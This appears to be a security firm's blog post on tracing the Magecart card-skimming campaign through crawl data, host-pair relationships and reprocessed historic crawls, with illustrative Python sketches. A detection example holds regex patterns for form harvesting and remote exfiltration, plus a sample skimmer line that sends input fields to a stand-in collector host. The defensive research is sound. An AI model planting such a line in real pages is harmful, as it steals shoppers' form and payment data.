The Magecart project is the biggest thing I’ve worked on in my career in terms of the scope of the cyber threat, the effects of the breaches, and, as a result, the media attention our work garnered. It would not have been possible without RiskIQ data.
Seeing words I wrote quoted on national news is a new experience for me personally, but the work we put into the project was anything but new. The data we used, as well as the techniques we employed to work with and surface it, were typical of the analytics and cyber threat detection we carry out at RiskIQ every day. In the case of Magecart, our data sets allowed us to discover the breadth and scope of a massive compromise across the internet in a way that few others could.
We first learned of the Inbenta breach through the disclosures that Ticketmaster, Monzo Bank, and Inbenta released in late June, and we decided to dig into our data to see what we could find. We quickly identified several crawls of Inbenta scripts stored in RiskIQ’s database. Finding them was relatively easy because Inbenta used hostnames that combined the name of the website using the script with its geographic region, e.g., ticketmasteruk.inbenta[.]com. Ticketmaster websites were using these scripts for the geographic areas described in the breach disclosure.
A key feature of RiskIQ’s integrated digital threat platform is our worldwide network of web crawlers. We continuously crawl the internet, collecting not just rendered pages but also the entire sequence of requests and responses that make up a web page—headers, dependent requests, certificates, and more. These crawls give us great insight into what is happening on a web server at any given point in time, and how that server would interact with a real user. We also incorporate the wealth of data we obtain from crawls into our aggregated datasets and our host pairs dataset, which proved especially useful for the analysis of Magecart. (A full description of host pairs is below.)
Back in 2015, RiskIQ researchers performed the initial research on Magecart, investigating their methods and infrastructure as well as developing detection signatures. We published a description of the cyber threat along with ClearSkySec in 2016. However, as happens with all threats, Magecart evolved, and the version of the data-stealing script we saw in the Inbenta breach was one we had not seen before.
After this discovery, the first order of business was to create new signature-based detections for the updated versions of Magecart. RiskIQ’s internal detection engine analyzes many features of a page, from the raw code and metadata to the web components present (e.g., servers, CMSs) to behavioral analysis of the page. From the examples found in our crawl data, we were able to create a varied list of detection signatures for Magecart.
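To make the idea of a signature-based detection concrete, here is a minimal sketch in Python. It is not RiskIQ’s detection engine, and it covers only the raw-code feature mentioned above. The `Signature` class, the rule names, and both regular expressions are hypothetical placeholders chosen for illustration; they are not real Magecart indicators.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Signature:
    name: str
    pattern: re.Pattern


# Hypothetical placeholder rules for illustration only; NOT real Magecart indicators.
SIGNATURES = [
    Signature("form-field-harvest",
              re.compile(r"querySelectorAll\(\s*['\"]input", re.I)),
    Signature("exfil-to-remote-host",
              re.compile(r"new\s+Image\(\)\.src\s*=\s*['\"]https?://", re.I)),
]


def match_signatures(script_text, signatures=SIGNATURES):
    """Return the names of all signatures whose pattern occurs in the script."""
    return [s.name for s in signatures if s.pattern.search(script_text)]


# A made-up script body that trips both placeholder rules.
sample = ('var f=document.querySelectorAll("input");'
          'new Image().src="https://collector.example/c?d="+f;')
print(match_signatures(sample))
```

A real engine would combine rules like these with the metadata, component, and behavioral features described above rather than relying on text patterns alone.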
The next goal was to find the scale and scope of this campaign. A critical tool in this effort was RiskIQ’s host pairs dataset. Host pairs leverages our crawl data to extract essential relationships between hosts. For example, if a page at “http://www.example.com/ooga.html” loads a script hosted at “http://cdn.somejs.com/foo.js”, that will generate a host pair between the parent host, “www.example.com” and the child host, “cdn.somejs.com”. We currently have more than 800 million host pairs and add more every day, enriching the picture of the global internet with these additional connections.
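The parent/child relationship described above can be sketched in a few lines of Python. This is only an illustration of the concept, not how the host pairs dataset is actually built; the function name `host_pairs` and the decision to skip same-host resources are assumptions made for the example.

```python
from urllib.parse import urlsplit


def host_pairs(page_url, resource_urls):
    """Return the set of (parent_host, child_host) pairs for one crawled page."""
    parent = urlsplit(page_url).hostname
    pairs = set()
    for url in resource_urls:
        child = urlsplit(url).hostname
        # Assumption: ignore resources served by the page's own host,
        # and URLs that carry no host at all (for example data: URIs).
        if child and child != parent:
            pairs.add((parent, child))
    return pairs


pairs = host_pairs(
    "http://www.example.com/ooga.html",
    ["http://cdn.somejs.com/foo.js", "http://www.example.com/style.css"],
)
print(pairs)
```

For the page in the example above, this yields a single pair with “www.example.com” as the parent and “cdn.somejs.com” as the child.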
By leveraging this data and finding all host pairs of Inbenta subdomains, we obtained an extensive list of historic crawls that contained likely infected hosts. We then went back in time and reprocessed these historic crawls with our new detection signatures, looking for occurrences of Magecart.
During the reprocessing, something happened that we did not expect: we immediately started getting hits on hosts other than Inbenta. Another third-party provider, cdn.pushassist[.]com, also showed evidence of the Magecart injection. By again referring to our host pairs dataset, we pulled over 1,700 new hosts to analyze. Each time we ran across a new third-party provider (SociaPlus, Annex Cloud, etc.), we pulled all the crawls we had for that provider and its host pairs and queued them for reprocessing. All told, we ended up rechecking six million crawls from 2016 through the present day.
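The loop described above, where each newly discovered provider feeds more crawls back into the queue, is essentially a breadth-first expansion. The sketch below shows that shape under heavy simplification: the in-memory dictionaries, the hostnames under `.example`, the `"SKIMMER"` marker, and the function name `expand_investigation` are all hypothetical stand-ins for the real datasets and detections.

```python
from collections import deque


def expand_investigation(seeds, host_pairs, crawls, detect):
    """Breadth-first expansion from seed providers to newly implicated ones.

    host_pairs: child (provider) host -> set of parent hosts that load it
    crawls:     parent host -> list of crawls, each {"scripts": {child_host: text}}
    detect:     callable returning True when a script matches a signature
    """
    queue = deque(seeds)
    providers = set(seeds)   # third-party hosts already queued
    affected = set()         # parent sites seen loading a flagged script
    while queue:
        provider = queue.popleft()
        for parent in host_pairs.get(provider, ()):
            for crawl in crawls.get(parent, ()):
                for child, text in crawl["scripts"].items():
                    if detect(text):
                        affected.add(parent)
                        if child not in providers:
                            # New provider: queue it so its host pairs get checked too.
                            providers.add(child)
                            queue.append(child)
    return providers, affected


# Hypothetical toy data.
pairs = {
    "widget.provider-a.example": {"shop1.example"},
    "cdn.provider-b.example": {"shop1.example", "shop2.example"},
}
crawl_store = {
    "shop1.example": [{"scripts": {"widget.provider-a.example": "SKIMMER",
                                   "cdn.provider-b.example": "SKIMMER"}}],
    "shop2.example": [{"scripts": {"cdn.provider-b.example": "SKIMMER",
                                   "cdn.clean.example": "ok"}}],
}
providers, affected = expand_investigation(
    ["widget.provider-a.example"], pairs, crawl_store, lambda t: "SKIMMER" in t
)
print(sorted(providers), sorted(affected))
```

Starting from a single seed provider, the toy run also surfaces the second provider and the additional site that loads it, which mirrors how one breach led us to the others.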
Our ability to go back in time allowed us to establish a clear timeline for the various breaches we detected and to pinpoint all the e-commerce sites that were affected by them over the course of that period. With this data, we can help sites affected by Magecart understand when the compromises occurred and how far they reached, which completes the picture of the breach and supports a fuller narrative for disclosure and for reporting to leadership.
We are continuing to use our data to research the Magecart cyber threat. That work includes examining other CDNs and third-party providers for signs of Magecart versions, developing further detection content and techniques for monitoring JavaScript and surfacing anomalous elements or changes in it, and checking past reported compromises that share elements with those we found during our previous investigations.
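As a rough illustration of how a timeline falls out of reprocessed crawls, the following Python sketch reduces a list of detections to the first and last date each host was seen infected. The function name `build_timeline`, the host `shop.example`, and the dates are all made up for the example.

```python
from datetime import date


def build_timeline(detections):
    """Map each host to (first_seen, last_seen) over its matching crawls.

    detections: iterable of (host, crawl_date) for crawls that hit a signature.
    """
    timeline = {}
    for host, seen in detections:
        first, last = timeline.get(host, (seen, seen))
        timeline[host] = (min(first, seen), max(last, seen))
    return timeline


# Illustrative, invented detections; order of arrival does not matter.
detections = [
    ("shop.example", date(2017, 5, 14)),
    ("shop.example", date(2017, 3, 1)),
    ("shop.example", date(2017, 9, 30)),
]
timeline = build_timeline(detections)
print(timeline["shop.example"])
```

The window between the first and last detection is only as precise as the crawl frequency for that host, so it bounds the compromise rather than dating it exactly.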